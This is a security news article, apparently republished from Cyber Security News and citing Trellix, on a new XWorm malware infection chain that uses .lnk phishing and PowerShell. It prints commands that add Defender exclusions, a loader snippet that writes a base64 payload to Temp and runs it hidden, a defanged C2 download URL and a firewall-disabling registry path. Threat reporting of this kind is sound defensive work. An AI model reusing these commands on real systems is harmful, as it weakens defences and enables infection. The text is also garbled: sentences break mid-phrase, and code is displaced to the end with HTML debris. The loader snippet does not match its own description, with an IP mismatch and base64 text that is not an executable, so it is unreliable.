Emerging quietly in mid-2025, the XWorm backdoor has evolved into a deceptively sophisticated threat that preys on both user confidence and system conventions.<\/p>\n
Initial reports surfaced when organizations noted a sudden uptick in obscure .lnk-based phishing emails masquerading as benign documents.<\/p>\n
Security teams quickly observed that these shortcuts triggered hidden PowerShell routines rather than opening any expected files, suggesting the emergence of a new infection chain.<\/p>\n
Within days, enterprises across multiple sectors reported anomalous network connections to unfamiliar IP addresses, hinting at an active Command and Control (C2) infrastructure.<\/p>\n
As the campaign gained momentum, Trellix analysts identified<\/a> a notable departure from XWorm\u2019s earlier, more predictable methods.<\/p>\n Gone were the simplistic batch scripts and obvious VBScript<\/a> payloads; instead, the attackers now deploy a multi-stage mechanism that leverages both social engineering and technical subterfuge.<\/p>\n The initial .lnk file, often delivered via targeted spear-phishing, drops a benign-looking text artifact before silently fetching \u201cdiscord.exe\u201d from a remote host.<\/p>\n Upon execution, this .NET-based executable unpacks and launches two additional components\u2014main.exe and system32.exe\u2014with the latter serving as the core XWorm payload.<\/p>\n Once system32.exe takes hold, it performs rigorous environment checks, aborting if it detects a sandbox or virtual machine.<\/p>\n If the host is deemed genuine, the malware duplicates itself as Xclient.exe and establishes persistence<\/a> by creating both a scheduled task and a registry Run key.<\/p>\n System defenses are methodically dismantled: Windows Firewall policies are disabled via modifications to These commands ensure XWorm operates under minimal scrutiny, allowing unfettered access to the compromised environment.<\/p>\n The heart of XWorm\u2019s new chain lies in its ingenious use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution.<\/p>\n The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command.<\/p>\n This command retrieves \u201cdiscord.exe\u201d from After activation, discord.exe drops main.exe and system32.exe, each packed with advanced obfuscation techniques to thwart static analysis.<\/p>\n Main.exe\u2019s resource section harbors embedded Python modules<\/a>, while system32.exe implements early TLS callbacks to execute critical code before any security hooks can intervene.<\/p>\n This layered approach not only complicates detection but ensures that each component reinforces the next, yielding a resilient, stealth-focused infection chain that challenges conventional defense strategies.<\/p>\n Through this evolution, XWorm<\/a> demonstrates how blending social engineering, multi-stage payload delivery, and sophisticated cryptographic concealment can enable adversaries to outpace existing detection technologies, maintaining both stealth and persistence within targeted networks.<\/p>\n The post XWorm Malware With New Infection Chain Evade Detection Exploiting User and System Trust<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhQc3QNJF8xq7zZjUpT8R2cvKz8ROwD1u8GT8gbBpqMFuNbfXLNf4dzhdO02tZUAkwNDmWb7d5-V94GuVYknapS75-YqqO3AWtVLOvyCGnVxaYVnP7qfRwVh7NSyjHN3kkJmUkOb11xMqkHg0bISTXtxL_f8y2G-BPUlUhSUy_yosPen2lVzIdtpseh0w0\/s16000\/Infection%2520chain%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\")
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallDisableFirewall<\/code>, while PowerShell execution policies are bypassed to white-list the malicious processes.<\/p>\nExecutionPolicy Bypass Add-MpPreference -ExclusionPath \"C:Tempdiscord.exe\"\nExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \"Xclient.exe\"<\/code><\/pre>\nInfection Mechanism and Deployment<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi3iU3wPcKfXqDlAXK1Hbww-EWHaHwDstESox3Wo45HcSXmSR5LOjTB2EejD1fYF7myFFHasNEIn-zV03FLLnbkFXGAy3abJSh4N-cf2aEJN0VQJwiOSYbvk8DHBoPPhjCebsaSOC-thMZim_XelqpMVDuu8PiXQS5GjTtTAypm0NYiS1nIFED0Q2BIm80\/s16000\/Content%2520in%2520the%2520.lnk%2520file%2520is%2520base64%2520encoded%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\")
hxxp:\/\/85[.]203[.]4[.]232:5000\/Discord.exe<\/code>, saving it to the Temp directory before launching it stealthily.<\/p>\n$payload = \"ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl\"\n[IO.File]::WriteAllBytes(\"$env:TEMPdiscord.exe\", [Convert]::FromBase64String($payload))\nStart-Process \"$env:TEMPdiscord.exe\" -WindowStyle Hidden<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgE6SEdvv_xHh9kk4fme2ZaWT03vxvUnGcRQr3N8af3ybc7L4iKEMMNCMNkYJ83sxmoM_rnKm8GDEfW5JokjLWpL7rGn2A4EfS72IIMrI-39uyoTYmNyy274gcbxylSqJAyUVP0VB0t0sTyUtOy4pZGTZmFHlqKdFrxKK9XwQq1KTp3Kgy3EONimyeA5mk\/s16000\/Process%2520tree%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\")
Boost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n